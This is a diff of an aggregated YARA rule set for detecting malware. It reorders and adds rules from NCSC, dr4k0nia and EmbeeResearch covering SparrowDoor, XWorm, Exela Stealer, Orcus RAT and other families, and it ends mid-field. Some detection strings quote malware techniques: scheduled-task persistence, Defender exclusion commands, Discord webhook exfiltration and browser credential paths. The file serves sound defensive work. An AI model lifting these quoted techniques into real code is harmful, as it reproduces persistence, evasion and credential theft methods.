uint16(0x50)==0x8b55) -} -rule NCSC_Sparrowdoor_Loader : FILE -{ - meta: - description = "Targets code features of the SparrowDoor loader. This rule detects the previous variant and this new variant." - author = "NCSC" - id = "7107cb82-c4c9-503f-b006-baec6b667498" - date = "2022-02-28" - modified = "2022-07-06" - reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf" - source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_loader.yar#L1-L15" - license_url = "N/A" - logic_hash = "fa1bd386114d912722a5101a0112355dec654e2e9446c885c12946c7fae1c8f4" - score = 75 - quality = 80 - tags = "FILE" - hash1 = "989b3798841d06e286eb083132242749c80fdd4d" - - strings: - $xor_algo = {8B D0 83 E2 03 8A 54 14 10 30 14 30 40 3B C1} - $rva = {8D B0 [4] 8D 44 24 ?? 50 6A 40 6A 05 56} - $lj = {2B CE 83 E9 05 8D [3] 52 C6 06 E9 89 4E 01 8B [3] 50 6A 05 56} - - condition: - ( uint16(0)==0x5A4D) and uint32( uint32(0x3C))==0x00004550 and all of them -} rule NCSC_Sparrowdoor_Strings { meta: @@ -209552,57 +211449,57 @@ rule NCSC_Sparrowdoor_Strings condition: 10 of them } -rule NCSC_Sparrowdoor_Xor +import "pe" + +rule NCSC_Sparrowdoor_Clipshot : FILE { meta: - description = "Highlights XOR routines in SparrowDoor. No MZ/PE match as the backdoor has no header. Targeting in memory." + description = "The SparrowDoor loader contains a feature it calls clipshot, which logs clipboard data to a file." author = "NCSC" - id = "9c07feea-91fc-528e-91ac-14d09fa1fc10" + id = "186e694b-6ae1-5042-847a-f54708dc76ef" date = "2022-02-28" modified = "2022-07-06" reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf" - source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_xor.yar#L1-L14" + source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_clipshot.yar#L3-L20" license_url = "N/A" - logic_hash = "3244e9017e5a0bf1c54e03b3191a5c695b2c1586b3ed4c529742f9b48903a348" + logic_hash = "7662e3be2752ac82d6cfe4b2e420157e78367c201c25ae34b5d956dc53ba20ae" score = 75 quality = 80 - tags = "" - hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f" + tags = "FILE" + hash1 = "989b3798841d06e286eb083132242749c80fdd4d" strings: - $xor_routine_outbound = {B8 39 8E E3 38 F7 E1 D1 EA 8D 14 D2 8B C1 2B C2 8A [4] 00 30 14 39 41 3B CE} - $xor_routine_inbound = {B8 25 49 92 24 F7 E1 8B C1 2B C2 D1 E8 03 C2 C1 E8 02 8D 14 C5 [4] 2B D0 8B C1 2B C2} - $xor_routine_config = {8B D9 83 E3 07 0F [6] 30 18 8D 1C 07 83 E3 07 0F [6] 30 58 01 8D 1C 28 83 E3 07 0F [6] 30 58 02 8D 1C 02 83 E3 07 0F [6] 30 58 03 8B DE 83 E3 07 0F [6] 30 58 04 83 C6 05 83 C1 05} + $exsting_cmp = {8B 1E 3B 19 75 ?? 83 E8 04 83 C1 04 83 C6 04 83 F8 04} + $time_format_string = "%d/%d/%d %d:%d" ascii + $cre_fil_args = {6A 00 68 80 00 00 00 6A 04 6A 00 6A 02 68 00 00 00 40 52} condition: - 2 of them + ( uint16(0)==0x5A4D) and uint32( uint32(0x3C))==0x00004550 and all of them and (pe.imports("User32.dll","OpenClipboard") and pe.imports("User32.dll","GetClipboardData") and pe.imports("Kernel32.dll","GetLocalTime") and pe.imports("Kernel32.dll","GlobalSize")) } -import "pe" - -rule NCSC_Sparrowdoor_Clipshot : FILE +rule NCSC_Sparrowdoor_Xor { meta: - description = "The SparrowDoor loader contains a feature it calls clipshot, which logs clipboard data to a file." + description = "Highlights XOR routines in SparrowDoor. No MZ/PE match as the backdoor has no header. Targeting in memory." author = "NCSC" - id = "186e694b-6ae1-5042-847a-f54708dc76ef" + id = "9c07feea-91fc-528e-91ac-14d09fa1fc10" date = "2022-02-28" modified = "2022-07-06" reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf" - source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_clipshot.yar#L3-L20" + source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_xor.yar#L1-L14" license_url = "N/A" - logic_hash = "7662e3be2752ac82d6cfe4b2e420157e78367c201c25ae34b5d956dc53ba20ae" + logic_hash = "3244e9017e5a0bf1c54e03b3191a5c695b2c1586b3ed4c529742f9b48903a348" score = 75 quality = 80 - tags = "FILE" - hash1 = "989b3798841d06e286eb083132242749c80fdd4d" + tags = "" + hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f" strings: - $exsting_cmp = {8B 1E 3B 19 75 ?? 83 E8 04 83 C1 04 83 C6 04 83 F8 04} - $time_format_string = "%d/%d/%d %d:%d" ascii - $cre_fil_args = {6A 00 68 80 00 00 00 6A 04 6A 00 6A 02 68 00 00 00 40 52} + $xor_routine_outbound = {B8 39 8E E3 38 F7 E1 D1 EA 8D 14 D2 8B C1 2B C2 8A [4] 00 30 14 39 41 3B CE} + $xor_routine_inbound = {B8 25 49 92 24 F7 E1 8B C1 2B C2 D1 E8 03 C2 C1 E8 02 8D 14 C5 [4] 2B D0 8B C1 2B C2} + $xor_routine_config = {8B D9 83 E3 07 0F [6] 30 18 8D 1C 07 83 E3 07 0F [6] 30 58 01 8D 1C 28 83 E3 07 0F [6] 30 58 02 8D 1C 02 83 E3 07 0F [6] 30 58 03 8B DE 83 E3 07 0F [6] 30 58 04 83 C6 05 83 C1 05} condition: - ( uint16(0)==0x5A4D) and uint32( uint32(0x3C))==0x00004550 and all of them and (pe.imports("User32.dll","OpenClipboard") and pe.imports("User32.dll","GetClipboardData") and pe.imports("Kernel32.dll","GetLocalTime") and pe.imports("Kernel32.dll","GlobalSize")) + 2 of them } rule NCSC_Sparrowdoor_Shellcode { @@ -209630,11 +211527,31 @@ rule NCSC_Sparrowdoor_Shellcode condition: 3 of them } +rule NCSC_Sparrowdoor_Config : FILE +{ + meta: + description = "Targets the XOR encoded loader config and shellcode in the file libhost.dll using the known position of the XOR key." + author = "NCSC" + id = "16eec5b6-c77a-585d-88f3-2c86abdbf2bd" + date = "2022-02-28" + modified = "2022-07-06" + reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf" + source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_config.yar#L1-L14" + license_url = "N/A" + logic_hash = "bd52496b6e7cabc875a277ce7d49f6b891c3f61591edef295dbee43716c15509" + score = 75 + quality = 80 + tags = "FILE" + hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f" + + condition: + ( uint16(0)!=0x5A4D) and ( uint16(0)!=0x8b55) and ( uint32(0)^ uint32(0x4c)==0x00) and ( uint32(0)^ uint32(0x34)==0x00) and ( uint16(0)^ uint16(0x50)==0x8b55) +} /* * YARA Rule Set * Repository Name: Dr4k0nia * Repository: https://github.com/dr4k0nia/yara-rules - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: 4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8 * Number of Rules: 5 * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance) @@ -209661,33 +211578,6 @@ If you use the Rules (including in modified form) on data, messages based on mat THE RULES ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE RULES OR THE USE OR OTHER DEALINGS IN THE RULES. */ -rule DR4K0NIA_MAL_Msil_Net_Niximports_Loader : FILE -{ - meta: - description = "Detects NixImports .NET loader" - author = "dr4k0nia" - id = "ba0d072d-674a-5790-9381-4dac98204268" - date = "2023-05-21" - modified = "2023-05-22" - reference = "https://github.com/dr4k0nia/NixImports" - source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_mal_niximports_loader.yar#L1-L21" - license_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/LICENSE.md" - logic_hash = "79421b2677705852f893fa53478deb2e4aa8bd354ac05cbf5438a3a2a15d70bf" - score = 75 - quality = 85 - tags = "FILE" - - strings: - $op_pe = {C2 95 C2 97 C2 B2 C2 92 C2 82 C2 82 C2 8E C2 82 C2 82 C2 82 C2 82 C2 86 C2 82} - $op_delegate = {20 F0 C7 FF 80 20 83 BF 7F 1F 14 14} - $a1 = "GetRuntimeProperties" ascii fullword - $a2 = "GetTypes" ascii fullword - $a3 = "GetRuntimeMethods" ascii fullword - $a4 = "netstandard" ascii fullword - - condition: - uint16(0)==0x5a4d and filesize <3MB and all of ($a*) and 2 of ($op*) -} import "dotnet" rule DR4K0NIA_Msil_Suspicious_Use_Of_Strreverse : FILE @@ -209716,36 +211606,6 @@ rule DR4K0NIA_Msil_Suspicious_Use_Of_Strreverse : FILE condition: uint16(0)==0x5a4d and dotnet.is_dotnet and filesize <50MB and $csharp and $vbnet and $strreverse } -rule DR4K0NIA_MAL_MSIL_NET_Typhonlogger_Jul23 : FILE -{ - meta: - description = "Detects TyphonLogger .NET payloads" - author = "dr4k0nia" - id = "2fbc1d9e-9c07-560b-9476-a176cdbe1bad" - date = "2023-11-07" - modified = "2023-07-11" - reference = "https://github.com/dr4k0nia/yara-rules" - source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/mal_msil_typhon_logger.yar#L1-L21" - license_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/LICENSE.md" - hash = "fc8733c217b49ca14702a59a637efc7dba6a2993d57e67424513ce2f5e9d8ed8" - logic_hash = "5c22aab1942e31095989b8267e0231191718d4ec44eb3afc6a50f929aae872c8" - score = 75 - quality = 81 - tags = "FILE" - - strings: - $sa1 = "SetWindowsHookEx" ascii fullword - $sa2 = "iphlpapi.dll" ascii fullword - $sa3 = "SendARP" ascii fullword - $sa4 = "costura.bouncycastle.crypto.dll.compressed" ascii fullword - $op1 = {51 32 46 79 64 47 55 67 51 6D 78 68 62 6D 4E 6F 5A 53 42 44 59 58 4A 6B} - $op2 = {53 57 35 7A 64 47 45 67 55 47 46 35 62 57 56 75 64 43 42 44 59 58 4A 6B} - $op3 = {20 25 32 C4 C1 35 4C 11 06 20 6B 6D AC 1D 35 1D 11 06 20 4B A6 CA 11 3B 59 01 00 00 11 06 20 6B 6D AC 1D} - $sx = "New Projects\\EmeraldLogger\\EmeraldLogger\\obj\\" ascii - - condition: - uint16(0)==0x5a4d and ($sx or ( all of ($sa*) and 2 of ($op*))) -} import "dotnet" rule DR4K0NIA_Msil_Susp_Obf_Antidump : FILE @@ -209786,6 +211646,33 @@ rule DR4K0NIA_Msil_Susp_Obf_Antidump : FILE condition: uint16(0)==0x5a4d and dotnet.is_dotnet and all of them } +rule DR4K0NIA_MAL_Msil_Net_Niximports_Loader : FILE +{ + meta: + description = "Detects NixImports .NET loader" + author = "dr4k0nia" + id = "ba0d072d-674a-5790-9381-4dac98204268" + date = "2023-05-21" + modified = "2023-05-22" + reference = "https://github.com/dr4k0nia/NixImports" + source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_mal_niximports_loader.yar#L1-L21" + license_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/LICENSE.md" + logic_hash = "79421b2677705852f893fa53478deb2e4aa8bd354ac05cbf5438a3a2a15d70bf" + score = 75 + quality = 85 + tags = "FILE" + + strings: + $op_pe = {C2 95 C2 97 C2 B2 C2 92 C2 82 C2 82 C2 8E C2 82 C2 82 C2 82 C2 82 C2 86 C2 82} + $op_delegate = {20 F0 C7 FF 80 20 83 BF 7F 1F 14 14} + $a1 = "GetRuntimeProperties" ascii fullword + $a2 = "GetTypes" ascii fullword + $a3 = "GetRuntimeMethods" ascii fullword + $a4 = "netstandard" ascii fullword + + condition: + uint16(0)==0x5a4d and filesize <3MB and all of ($a*) and 2 of ($op*) +} import "dotnet" rule DR4K0NIA_Msil_Susp_Obf_Xorstringsnet : FILE @@ -209793,29 +211680,59 @@ rule DR4K0NIA_Msil_Susp_Obf_Xorstringsnet : FILE meta: description = "Detects XorStringsNET string encryption, and other obfuscators derived from it" author = "dr4k0nia" - id = "0bea654d-9244-5320-a815-691384decc74" - date = "2023-03-26" - modified = "2023-03-26" + id = "0bea654d-9244-5320-a815-691384decc74" + date = "2023-03-26" + modified = "2023-03-26" + reference = "https://github.com/dr4k0nia/yara-rules" + source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_susp_obf_xorstringsnet.yar#L3-L16" + license_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/LICENSE.md" + logic_hash = "c494b5b64bcb63d1edd611206fb41eb9a23a940a72c3e9fc3f626e91482b1352" + score = 65 + quality = 85 + tags = "FILE" + version = "1.0" + + strings: + $pattern = { 06 1E 58 07 8E 69 FE17 } + + condition: + uint16(0)==0x5a4d and filesize <25MB and dotnet.is_dotnet and $pattern +} +rule DR4K0NIA_MAL_MSIL_NET_Typhonlogger_Jul23 : FILE +{ + meta: + description = "Detects TyphonLogger .NET payloads" + author = "dr4k0nia" + id = "2fbc1d9e-9c07-560b-9476-a176cdbe1bad" + date = "2023-11-07" + modified = "2023-07-11" reference = "https://github.com/dr4k0nia/yara-rules" - source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_susp_obf_xorstringsnet.yar#L3-L16" + source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/mal_msil_typhon_logger.yar#L1-L21" license_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/LICENSE.md" - logic_hash = "c494b5b64bcb63d1edd611206fb41eb9a23a940a72c3e9fc3f626e91482b1352" - score = 65 - quality = 85 + hash = "fc8733c217b49ca14702a59a637efc7dba6a2993d57e67424513ce2f5e9d8ed8" + logic_hash = "5c22aab1942e31095989b8267e0231191718d4ec44eb3afc6a50f929aae872c8" + score = 75 + quality = 81 tags = "FILE" - version = "1.0" strings: - $pattern = { 06 1E 58 07 8E 69 FE17 } + $sa1 = "SetWindowsHookEx" ascii fullword + $sa2 = "iphlpapi.dll" ascii fullword + $sa3 = "SendARP" ascii fullword + $sa4 = "costura.bouncycastle.crypto.dll.compressed" ascii fullword + $op1 = {51 32 46 79 64 47 55 67 51 6D 78 68 62 6D 4E 6F 5A 53 42 44 59 58 4A 6B} + $op2 = {53 57 35 7A 64 47 45 67 55 47 46 35 62 57 56 75 64 43 42 44 59 58 4A 6B} + $op3 = {20 25 32 C4 C1 35 4C 11 06 20 6B 6D AC 1D 35 1D 11 06 20 4B A6 CA 11 3B 59 01 00 00 11 06 20 6B 6D AC 1D} + $sx = "New Projects\\EmeraldLogger\\EmeraldLogger\\obj\\" ascii condition: - uint16(0)==0x5a4d and filesize <25MB and dotnet.is_dotnet and $pattern + uint16(0)==0x5a4d and ($sx or ( all of ($sa*) and 2 of ($op*))) } /* * YARA Rule Set * Repository Name: EmbeeResearch * Repository: https://github.com/embee-research/Yara-detection-rules/ - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4 * Number of Rules: 39 * Skipped: 0 (age), 8 (quality), 0 (score), 0 (importance) @@ -209825,137 +211742,123 @@ rule DR4K0NIA_Msil_Susp_Obf_Xorstringsnet : FILE * * NO LICENSE SET */ -rule EMBEERESEARCH_Win_Medusa_Bytecodes -{ - meta: - description = "Medusa Bytecodes" - author = "Matthew @ Embee_Research" - id = "48b659f8-cd26-540a-89b6-6349f8d21e8f" - date = "2023-08-27" - modified = "2024-03-03" - reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_medusa_dotnet_bytecodes.yar#L1-L17" - license_url = "N/A" - hash = "a1211549b4e1a7befd953d03b4d929b3dc9f25ec6c1bc9c05ae92a0ec08fb77c" - logic_hash = "aa01afd6981af99625a9fca93e512cc00931aca18e55c5cb6dee11efb9ea2968" - score = 75 - quality = 75 - tags = "" - - strings: - $s1 = {1F ?? 8D ?? ?? ?? 01 25 16 72 ?? ?? ?? 70 A2 25 17 72 ?? ?? ?? 70 28 ?? ?? ?? 0A A2 25 18 20 ?? ?? ?? 00 13 04 12 04 28 ?? ?? ?? 0A A2 25 19 20 ?? ?? ?? 00 13 ?? 12 } - $s2 = "\\Medusa\\obj\\Release\\Medusa.pdb" ascii +import "dotnet" - condition: - $s1 or $s2 -} -rule EMBEERESEARCH_Win_Cobalt_Sleep_Encrypt : FILE +rule EMBEERESEARCH_Win_Solarmarker_Bytecodes : FILE { meta: - description = "Detects Sleep Encryption Logic Found in Cobalt Strike Deployments" + description = "Detects bytecodes present in solarmarker Packer" author = "Matthew @ Embee_Research" - id = "6bd6fbb4-6634-5b51-90f0-f24e48d69043" - date = "2023-08-27" - modified = "2023-10-18" + id = "d405e7ae-f09b-5993-a510-e5e1bc289898" + date = "2023-09-10" + modified = "2023-09-11" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobalt_sleep_encrypt_aug_2023.yar#L1-L55" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_solarmarker_bytecodes_aug_2023.yar#L3-L21" license_url = "N/A" - hash = "26b2f12906c3590c8272b80358867944fd86b9f2cc21ee6f76f023db812e5bb1" - logic_hash = "7aa2674ecaaae819c3f26924fa0622df322b1214493f37b1bdf5e00ba5ee98e6" + hash = "a433dad1e31f2e19ab5d22b6348c73fa4c874502acc20d5517d785b554754279" + logic_hash = "52256184706b7173ee8e8683ac79c1b9d4773778c135e4dae255376c0a6651fb" score = 75 quality = 75 tags = "FILE" strings: - $r1_nokey = {4E 8B 04 08 B8 ?? ?? ?? ?? 41 F7 E3 41 8B C3 C1 EA 02 41 FF C3 6B D2 0D 2B C2 8A 4C 18 18 41 30 0C 38 48 8B 43 10 41 8B FB 4A 3B 7C 08 08} - $r2_nokey = {49 8B F9 4C 8B 03 B8 ?? ?? ?? ?? 41 F7 E1 41 8B C1 C1 EA 02 41 FF C1 6B D2 0D 2B C2 8A 4C 18 18 42 30 0C 07 48 FF C7 45 3B CB} + $s1 = {8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 20 ?? ?? ?? ?? 13 ?? 06 11 ?? 20 ?? ?? ?? ?? 58 D1 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 20 ?? ?? ?? ?? 13 ?? 06 11 ?? 20 ?? ?? ?? ?? 58 D1 8C ?? ?? ?? ?? 28 ?? ?? ?? ??} condition: - ($r1_nokey or $r2_nokey) + dotnet.is_dotnet and filesize <7000KB and $s1 } import "dotnet" -rule EMBEERESEARCH_Win_Quasar_Rat_Client : FILE +rule EMBEERESEARCH_Win_Xworm_Simple_Strings { meta: - description = "Detects strings present in Quasar Rat Samples." + description = "Detects simple strings present in unobfuscated xworm" author = "Matthew @ Embee_Research" - id = "7fc0bd6d-e187-51b7-a8b8-68b17271cef8" - date = "2023-08-27" + id = "8d5d8f07-72fa-596b-a3fc-1dee4b7fd058" + date = "2023-08-30" modified = "2023-10-18" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_quasar_rat_client_aug_2023.yar#L3-L37" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_xworm_simple_strings_sep_2023.yar#L3-L29" license_url = "N/A" - hash = "914d88f295ac2213f37d3f71e6d4383979283d1728079a208f286effb44d840c" - hash = "45a724179ae1d08044c4bafb69c7f9cdb4ed35891dc9cf24aa664d75464ceb6d" - hash = "7e13bcd73232c3f33410aa95f61e1196a2f9ae35e05c1f9c8f251e07077a9dfb" - logic_hash = "efba911780ffb144f277e88ff8ca8f53a90c32a677ccb19ec26e71f974a1b91f" + hash = "4459d95c0493d640ecc9453cf6a4f2b7538b1a7b95032f70803fc726b8e40422" + hash = "820bb1a31f421b90ea51efc3e71cc720c8c2784fb1e882e732e8fafb8631a389" + logic_hash = "f7df310b24b2078249cdb670ece71ebe30f985c92b3e44b6dcf0e37405a26bc3" score = 75 quality = 75 - tags = "FILE" + tags = "" strings: - $s1 = "Quasar Client" ascii wide - $s2 = "Quasar.Client.Properties.Resources" ascii wide - $s3 = "Google\\Chrome\\User Data\\Default\\" wide - $s4 = "\\Mozilla\\Firefox\\Profiles" wide - $s5 = "Yandex\\YandexBrowser\\User Data\\Default\\" wide + $x1 = "XWorm V" wide nocase + $s1 = "/create /f /RL HIGHEST /sc minute /mo 1 /tn " wide + $s2 = "/create /f /sc minute /mo 1 /tn " wide + $s3 = "-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath " wide condition: - uint16(0)==0x5a4d and dotnet.is_dotnet and filesize <7000KB and ( for any i in (0..dotnet.number_of_resources-1) : (dotnet.resources[i].name=="Quasar.Client*") or (3 of ($s*))) + dotnet.is_dotnet and $x1 and (2 of ($s*)) } -import "pe" +import "dotnet" -rule EMBEERESEARCH_Win_Icedid_Snowloader_Bytecodes_Oct_2023 +rule EMBEERESEARCH_Win_Exela_Stealer_Simple_Strings_Sep_2023 { meta: description = "No description has been set in the source file - EmbeeResearch" - author = "Matthew @ Embee_Research" - id = "ad5d7bf5-813d-519d-91ae-e6a69fd557df" - date = "2023-08-27" - modified = "2023-10-18" + author = "Matthew @embee_research" + id = "e63aa1d3-997e-5200-93fc-869c177fe1a8" + date = "2023-09-24" + modified = "2023-09-26" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_icedid_snowloader_bytecodes_oct_2023.yar#L2-L23" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_exela_stealer_simple_strings_sep_2023.yar#L4-L32" license_url = "N/A" - hash = "e096de90f65ff83ed0e929b330aa765a8e2322625325fb042775bff1748467cc" - hash = "e87928fcddf13935c91a0b5577e28efd29bb6a5c1d98e5129dec63e231601053" - hash = "82a01607ebdcaa73b9ff201ccb76780ad8de4a99dd3df026dcb71b0f007456ed" - logic_hash = "5baa308ce130cbbe80f94fc127b083f26ae87552910c2bc6f3bae3008cf1aa63" + hash = "bf5d70ca2faf355d86f4b40b58032f21e99c3944b1c5e199b9bb728258a95c1b" + logic_hash = "2312b63fe86fd34eb12f42f079f470eb3af27ef8c199f3620253c828ad28441a" score = 75 quality = 75 tags = "" strings: - $s_1 = {4c 77 26 07} - $s_2 = {58 a4 53 e5} - $s_3 = {10 e1 8a c3} + $s1 = "https://i.instagram.com/api/v1/accounts/current_user/" wide + $s2 = "/create /f /sc onlogon /rl highest /tn \"AutoUpdateCheckerOnLogon\" /tr " wide + $s4 = "https://discord.com/api/webhooks/" wide + $s5 = "Browser : {0} | Name : {1} | Value : {2} | Date created (timestamp) : {3} | Date last used (timestamp) : {4} | Count {5}" wide + $s6 = "Browser : {0} | {1} {2}/{3} {4}" wide + $e1 = "Exela.Program" wide ascii + $e2 = "Exela.Wifi" wide ascii + $e3 = "Exela.Components" wide ascii + $e4 = "Exela Stealer" wide ascii + $e5 = "Exela.exe" wide ascii condition: - ( all of ($s*)) and pe.number_of_exports>20 + dotnet.is_dotnet and (( all of ($s*)) or (3 of ($e*))) } -rule EMBEERESEARCH_Win_Solarmarker_Stage2_Bytecodes_Dec_2023 +rule EMBEERESEARCH_Win_Orcus_Rat_Simple_Strings_Dec_2023 { meta: - description = "Patterns observed in Solarmarker stage2 dll" + description = "Strings observed in Orcus RAT" author = "Matthew @ Embee_Research" - id = "9aba6cdf-1491-579d-b4a7-fe229272015d" - date = "2023-12-28" - modified = "2023-12-28" + id = "baef6b96-bf94-5363-9186-9761a8055afd" + date = "2023-12-24" + modified = "2023-12-24" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_solarmarker_stage2_bytecodes_dec_2023.yar#L1-L20" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_orcus_rat_simple_strings_dec_2023.yar#L1-L26" license_url = "N/A" - hash = "4a3b60496a793ee96a51fecf8690ef8312429a6b54d32f2a4424395c47b47fc8" - hash = "e0b2457491a8c2d50710aa343ad1957a76f83ceaf680165ffa0e287fe18abbd6" - logic_hash = "8e50e5942f0029ffda1d9750f8cc8e004a2512e50b6a14c1619ae0b83477a944" + hash = "30a2a674d55d7898d304713dd2f69a043d875230ea7ebee22596ba4c640768db" + logic_hash = "2e0a44ec2749e0fc646dfb003a2d32b3fecfa07ece72ca5a65116250d80496b8" score = 75 quality = 75 tags = "" strings: - $s1 = {6F ?? ?? 00 0A 1F 20 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 09 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0A 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0D 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0A } + $s1 = "Orcus is a Remote Administration Tool for Windows. It allows the administrator to make changes to the system remotely." wide + $s2 = "Orcus.Service" wide + $s4 = "costura.orcus" wide + $s5 = "Orcus.Commands" + $s6 = "Orcus.Shared" + $s7 = "Orcus.Utilities" + $s8 = "Orcus.StaticCommands" + $s9 = "Orcus.Plugins" condition: - $s1 + (5 of them ) } rule EMBEERESEARCH_Win_Mystic_Stealer_Bytecodes_Sep_2023 { @@ -209996,104 +211899,62 @@ rule EMBEERESEARCH_Win_Mystic_Stealer_Bytecodes_Sep_2023 } import "dotnet" -rule EMBEERESEARCH_Win_Solarmarker_Bytecodes : FILE -{ - meta: - description = "Detects bytecodes present in solarmarker Packer" - author = "Matthew @ Embee_Research" - id = "d405e7ae-f09b-5993-a510-e5e1bc289898" - date = "2023-09-10" - modified = "2023-09-11" - reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_solarmarker_bytecodes_aug_2023.yar#L3-L21" - license_url = "N/A" - hash = "a433dad1e31f2e19ab5d22b6348c73fa4c874502acc20d5517d785b554754279" - logic_hash = "52256184706b7173ee8e8683ac79c1b9d4773778c135e4dae255376c0a6651fb" - score = 75 - quality = 75 - tags = "FILE" - - strings: - $s1 = {8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 20 ?? ?? ?? ?? 13 ?? 06 11 ?? 20 ?? ?? ?? ?? 58 D1 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 20 ?? ?? ?? ?? 13 ?? 06 11 ?? 20 ?? ?? ?? ?? 58 D1 8C ?? ?? ?? ?? 28 ?? ?? ?? ??} - - condition: - dotnet.is_dotnet and filesize <7000KB and $s1 -} -import "dotnet" - -rule EMBEERESEARCH_Win_Njrat_Bytecodes_V2_Oct_2023 +rule EMBEERESEARCH_Win_Njrat_Strings_Oct_2023 { meta: description = "" author = "Matthew @ Embee_Research" - id = "9090574e-7ad4-5207-af8b-7b56f2a1c917" + id = "c89711cb-aae9-5409-80c2-145a8d5fca56" date = "2023-10-03" - modified = "2023-10-08" + modified = "2023-10-03" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_bytecodes_v2_oct_2023.yar#L5-L27" + source_url = 